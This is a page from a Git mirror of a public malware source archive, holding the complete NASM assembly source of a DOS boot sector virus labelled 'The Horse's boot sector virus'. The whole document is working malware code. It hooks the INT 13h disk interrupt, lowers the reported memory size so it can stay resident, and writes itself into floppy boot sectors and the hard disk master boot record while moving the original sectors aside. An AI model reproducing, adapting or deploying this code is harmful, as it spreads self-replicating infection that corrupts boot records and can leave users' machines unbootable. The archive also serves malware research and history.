mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
4b9382ddbc
push
217 lines
2.2 KiB
NASM
217 lines
2.2 KiB
NASM
;
|
||
; The Horse's boot sector virus
|
||
; This is an author's source
|
||
;
|
||
|
||
|
||
|
||
.radix 16
|
||
begin:
|
||
jmp start
|
||
|
||
my label word
|
||
|
||
db 'IBM 3.3'
|
||
dw 200
|
||
db 2
|
||
dw 1
|
||
db 2
|
||
dw 70
|
||
dw 2d0
|
||
db 0fdh
|
||
dw 2
|
||
dw 9
|
||
dw 2
|
||
dw 0
|
||
|
||
lee label word
|
||
|
||
virlen equ offset endcode-begin
|
||
|
||
start:
|
||
cld
|
||
sub ax,ax
|
||
mov ds,ax
|
||
mov bp,7c00
|
||
cli
|
||
mov ss,ax
|
||
mov sp,bp
|
||
sti
|
||
push ax
|
||
push bp
|
||
mov ax,[413]
|
||
push [13*4+2]
|
||
push [13*4]
|
||
pop word ptr [old13h+7c00-100]
|
||
pop word ptr [old13h+7c00-100+2]
|
||
dec ax
|
||
mov [413],ax
|
||
mov cl,6
|
||
shl ax,cl
|
||
mov es,ax
|
||
|
||
mov [13*4],offset int13h-100
|
||
mov [13*4+2],es
|
||
|
||
mov cx,virlen
|
||
sub di,di
|
||
mov si,bp
|
||
rep movsb
|
||
push es
|
||
mov ax,offset here-begin
|
||
push ax
|
||
retf
|
||
here:
|
||
sub ax,ax
|
||
mov es,ax
|
||
int 13
|
||
mov ax,0201
|
||
mov bx,bp
|
||
cmp byte ptr cs:[ident-100],0fdh
|
||
je from_disk
|
||
mov cx,0007
|
||
mov dx,0080
|
||
int 13
|
||
jmp exit
|
||
|
||
from_disk:
|
||
|
||
mov cx,2709
|
||
mov dx,0100
|
||
int 13
|
||
jc exit
|
||
push cs
|
||
push cs
|
||
pop es
|
||
pop ds
|
||
mov ax,0201
|
||
mov bx,0200
|
||
mov cx,0001
|
||
mov dx,0080
|
||
int 13
|
||
jc exit
|
||
call inf?
|
||
je exit
|
||
mov byte ptr [ident-100],0f8
|
||
mov ax,0301
|
||
mov bx,0200
|
||
mov cx,0007
|
||
mov dx,0080
|
||
int 13
|
||
jc exit
|
||
call move
|
||
mov ax,0301
|
||
sub bx,bx
|
||
mov cx,0001
|
||
int 13
|
||
exit:
|
||
mov byte ptr cs:[ident-100],0fdh
|
||
retf
|
||
int13h:
|
||
push ds
|
||
push ax
|
||
cmp dl,1
|
||
ja skip
|
||
cmp ah,2
|
||
jb skip
|
||
cmp ah,3
|
||
ja skip
|
||
sub ax,ax
|
||
mov ds,ax
|
||
mov al,[43f]
|
||
push dx
|
||
and ax,3
|
||
and dx,3
|
||
inc dl
|
||
test al,dl
|
||
pop dx
|
||
jne skip
|
||
call infect
|
||
skip:
|
||
pop ax
|
||
pop ds
|
||
do:
|
||
jmp dword ptr cs:[old13h-100]
|
||
|
||
infected?:
|
||
|
||
sub ax,ax
|
||
call ojoj
|
||
mov ax,0201
|
||
mov bx,0200
|
||
mov cx,0001
|
||
sub dh,dh
|
||
call ojoj
|
||
inf?:
|
||
mov si,offset start-100
|
||
mov di,offset start-100+200
|
||
mov cx,mbyte-start
|
||
rep cmpsb
|
||
return:
|
||
ret
|
||
infect:
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push si
|
||
push di
|
||
push es
|
||
push cs
|
||
push cs
|
||
pop es
|
||
pop ds
|
||
cld
|
||
call infected?
|
||
je leave
|
||
mov ax,0301
|
||
mov bx,0200
|
||
mov cx,2709
|
||
mov dh,1
|
||
call ojoj
|
||
jc leave
|
||
call move
|
||
mov ax,0301
|
||
sub bx,bx
|
||
mov cx,0001
|
||
sub dh,dh
|
||
call ojoj
|
||
leave:
|
||
pop es
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
ret
|
||
|
||
ojoj:
|
||
pushf
|
||
push cs
|
||
call do
|
||
ret
|
||
move:
|
||
mov di,offset my-100
|
||
mov si,offset my-100+200
|
||
mov cx,lee-my
|
||
rep movsb
|
||
mov di,offset usm-100
|
||
mov si,offset usm-100+200
|
||
mov cx,endcode-usm
|
||
rep movsb
|
||
ret
|
||
|
||
|
||
mbyte label word
|
||
|
||
old13h dd ?
|
||
ident db 0fdh
|
||
|
||
usm label word
|
||
|
||
db 135d dup (?)
|
||
|
||
db 55,0AA
|
||
|
||
endcode label word
|
||
|
||
|